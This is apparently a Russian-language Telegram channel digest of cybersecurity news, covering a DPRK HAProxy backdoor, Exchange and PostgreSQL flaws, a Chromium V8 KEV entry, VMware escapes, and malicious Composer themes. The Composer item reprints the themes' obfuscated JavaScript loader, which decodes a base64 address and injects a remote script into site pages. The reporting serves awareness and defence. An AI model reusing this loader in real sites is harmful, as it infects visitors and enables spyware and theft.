CBUnit – главное в кибербезопасности
53 subscribers
369 photos
4.43K links
Краткое содержание новостей кибербезопасности

По вопросам: a@cbunit.ru
Download Telegram
DPRK APT используют HAProxy и curlRAT для шпионажа за медиа и автопромом Южной Кореи

Исследователи Rapid7 обнаружили новый набор инструментов для Linux, нацеленный на южнокорейские медиа и автомобильную промышленность. Кампания использует бэкдор "ted backdoor" в HAProxy, а также троянизированные версии системных утилит.

Этот фреймворк позволяет злоумышленникам выполнять удаленные команды, внедрять вредоносные скрипты в веб-трафик, собирать учетные данные и вести долгосрочную слежку. Бэкдор "ted backdoor" интегрируется в HAProxy версии 2.8.12, используя его API для перехвата трафика и сокрытия от мониторинга.

Вместе с бэкдором используются SSH-кейлоггер и RAT на базе curl. Исследователи связывают эти атаки со средней степенью уверенности с северокорейскими APT-группировками, предполагая цели шпионажа. Кампании, вероятно, начались в начале 2025 года, а самые ранние загрузки на VirusTotal датируются серединой 2025 года.

Что такое "ted backdoor"
"ted backdoor" — это вредоносный модуль, интегрированный в легитимный балансировщик нагрузки HAProxy. Он использует внутренние механизмы HAProxy для перехвата и анализа HTTP-трафика, кражи сессионных cookie и внедрения пользовательских скриптов на веб-страницы. Это позволяет злоумышленникам проводить атаки типа "watering hole" и собирать конфиденциальные данные.

Источник: Rapid7
@cbunit
Пароли в Active Directory: как угадать «сложный» пароль сотрудника

Источник: InfoWatch
@cbunit
Уязвимость в Microsoft Exchange позволяет обходить аутентификацию — эксплойт опубликован

Microsoft выпустила исправление для уязвимости CVE-2026-62911 в Exchange Server 2016, 2019 и Subscription Edition. Уязвимость с оценкой CVSS 8.0 позволяет обходить аутентификацию и получать полный контроль над почтовыми ящиками.

По состоянию на 1 сентября 2026 года около 22 000 серверов Exchange остаются неисправленными и доступными из интернета. Эксплуатационный код уязвимости уже опубликован. Национальный центр кибербезопасности Нидерландов (NCSC-NL) рекомендует сделать серверы Exchange недоступными из интернета до установки патча.

Уязвимость CVE-2026-62911
CVE-2026-62911 — это уязвимость обхода аутентификации в Microsoft Exchange Server. Её успешная эксплуатация позволяет злоумышленнику с базовыми привилегиями получить полный контроль над всеми почтовыми ящиками на целевом сервере, включая чтение и отправку писем, а также загрузку вложений. Уязвимость имеет высокий уровень серьёзности с оценкой CVSS 8.0.

Источник: Zscaler ThreatLabz
@cbunit
Уязвимость в PostgreSQL PostGREShell даёт полный контроль над сервером

Обнаружена 12-летняя уязвимость в PostgreSQL под названием PostGREShell (CVE-2026-6471). Она позволяет получить удалённое выполнение кода и постоянные права суперпользователя через доступ к репликации.

Уязвимость затрагивает версии PostgreSQL, использующие низкоуровневый доступ к репликации. Эксплуатация PostGREShell создаёт бэкдор в базе данных, обеспечивая постоянный доступ к серверу.

Что такое PostGREShell
PostGREShell — это уязвимость в системе управления базами данных PostgreSQL, позволяющая злоумышленникам получить полный контроль над сервером. Она использует низкоуровневый доступ к механизму репликации для выполнения произвольного кода и установки бэкдора.

❝Dubbed PostGREShell, CVE-2026-6471 turns low-level replication access into code execution, permanent superuser privileges and a persistent database backdoor.❞
— SecurityWeek


Источники: SecurityWeek · Security Affairs
@cbunit
Boeing 737 взломали через порт: атака Bus Driver подменяет данные полета

Источник: Kaspersky Daily
@cbunit
❢ Google Chromium V8: CISA добавила уязвимость подмены типов в каталог KEV

CISA добавила одну новую уязвимость в каталог известных эксплуатируемых уязвимостей (KEV) из-за доказательств её активной эксплуатации.

Уязвимость CVE-2026-85046 относится к Google Chromium V8 и представляет собой подмену типов. Этот тип уязвимостей является частым вектором атак и создаёт значительные риски для федеральных систем.

Google Chromium V8 Type Confusion Vulnerability
Уязвимость типа «подмена типов» (Type Confusion) в движке V8 браузера Google Chromium позволяет злоумышленникам манипулировать типами данных, что может привести к выполнению произвольного кода или другим опасным последствиям.

Источники: CISA · Help Net Security
@cbunit
Вредоносные темы Composer доставляют шпионское ПО для кражи криптокошельков с iPhone

▤ Разбор

Исследователи Socket обнаружили 13 вредоносных тем Composer на Packagist, которые внедряют JavaScript на сайты с фильмами и комиксами во Вьетнаме. Вредоносный код выполняет две операции: запускает цепочку мошенничества с рекламой и перенаправлением на азартные игры, а также устанавливает шпионское ПО на iPhone через эксплойт WebKit-to-kernel.

Apple подтвердила, что уязвимость ядра была исправлена до получения отчёта, а точки входа WebKit общедоступны и внесены в каталог CISA "Уязвимости, эксплуатируемые прямо сейчас" (KEV). Ранее исследователи Socket сообщали о шести темах под одним вендором (ophimcms), теперь подтверждённый набор расширен до 13 пакетов от пяти вендоров.

Что такое Composer
Composer — это инструмент управления зависимостями для PHP. Он позволяет разработчикам указывать, какие библиотеки нужны их проекту, и устанавливать их. Вредоносные темы Composer, обнаруженные исследователями, представляют собой пакеты, которые злоумышленники модифицировали, чтобы внедрить вредоносный JavaScript на сайты, использующие эти темы.

eval('window')['KuCbGF']=function(){ (function(u,r,w,d,f,c){
var x = iScfnleC; u = decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));
var s = d.createElement('script'); s.src=u; d.getElementsByTagName('head')[0].appendChild(s)
})('aHR0cHM6Ly91bmlvbi5tYWNvbXMubGEvanF1ZXJ5Lm1pbi0zLjYuOC5qcw==', ...) };
if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) KuCbGF();


Источник: Socket
@cbunit
Минцифры предложило требования по защите от НСД к системам ОРД

Минцифры России разработало проект требований по защите от несанкционированного доступа к техническим и программным средствам информационных систем. Документ касается средств, используемых при проведении оперативно-разыскных мероприятий или обеспечении безопасности РФ.

Проект направлен на независимую антикоррупционную экспертизу. Он устанавливает правила защиты информации в системах, применяемых уполномоченными органами.

Источник: regulation.gov.ru
@cbunit
Broadcom закрыла критические VM-escape уязвимости в VMware Workstation и Fusion

Broadcom устранила две уязвимости в VMware Workstation и Fusion, позволяющие атакующему из виртуальной машины выполнить код на хосте. Одна из уязвимостей получила критический рейтинг.

Проблемы затрагивают версии VMware Workstation и Fusion 25H2 и 26H1. Обновление до версии 26H1u1 устраняет обе уязвимости. Обходных путей для эксплуатации не существует.

Что такое VM-escape
VM-escape — это тип атаки, при котором злоумышленник, получивший контроль над виртуальной машиной, может выйти за её пределы и получить доступ к хостовой системе или другим виртуальным машинам на том же оборудовании. Это происходит из-за ошибок в гипервизоре или компонентах, связывающих гостевую ОС с хостом.

Источники: Security Affairs · The Hacker News
@cbunit
Zscaler: ИИ-атаки ускоряются, готовность компаний — на нуле

▤ Разбор · 29 дней назад

Zscaler ThreatLabz опубликовал отчёт о готовности предприятий к автономным кибератакам с использованием передовых моделей ИИ.

Исследование выявило средний балл готовности 37 из 100, при этом оценка управления ИИ составила всего 2,1 из 20. Большинство организаций имеют уязвимые VPN-подключения, неинспектируемый трафик и широкие настройки сегментации, что создаёт благоприятные условия для атак.

Отчёт предлагает архитектурный подход к защите, основанный на принципах Zero Trust, для нейтрализации преимуществ ИИ в скорости атак. Рекомендуется в течение 90 дней усилить контроль над сетевыми устройствами, изолировать VPN, обеспечить идентификационную аутентификацию для ИИ-систем и увеличить долю инспектируемого зашифрованного трафика.

Что такое Frontier AI
Frontier AI — это передовые, высокопроизводительные фундаментальные модели, расширяющие границы искусственного интеллекта. В отличие от традиционного узкого ИИ, эти модели обладают сложными возможностями рассуждения, планирования и автономного выполнения задач. В руках злоумышленников они могут находить мелкие уязвимости и объединять их в полные пути атак со скоростью машины.

Источник: Zscaler ThreatLabz
@cbunit
MikroTik RouterOS: уязвимость нулевого дня позволяет получить root-доступ без пароля

Источник: Security Affairs
@cbunit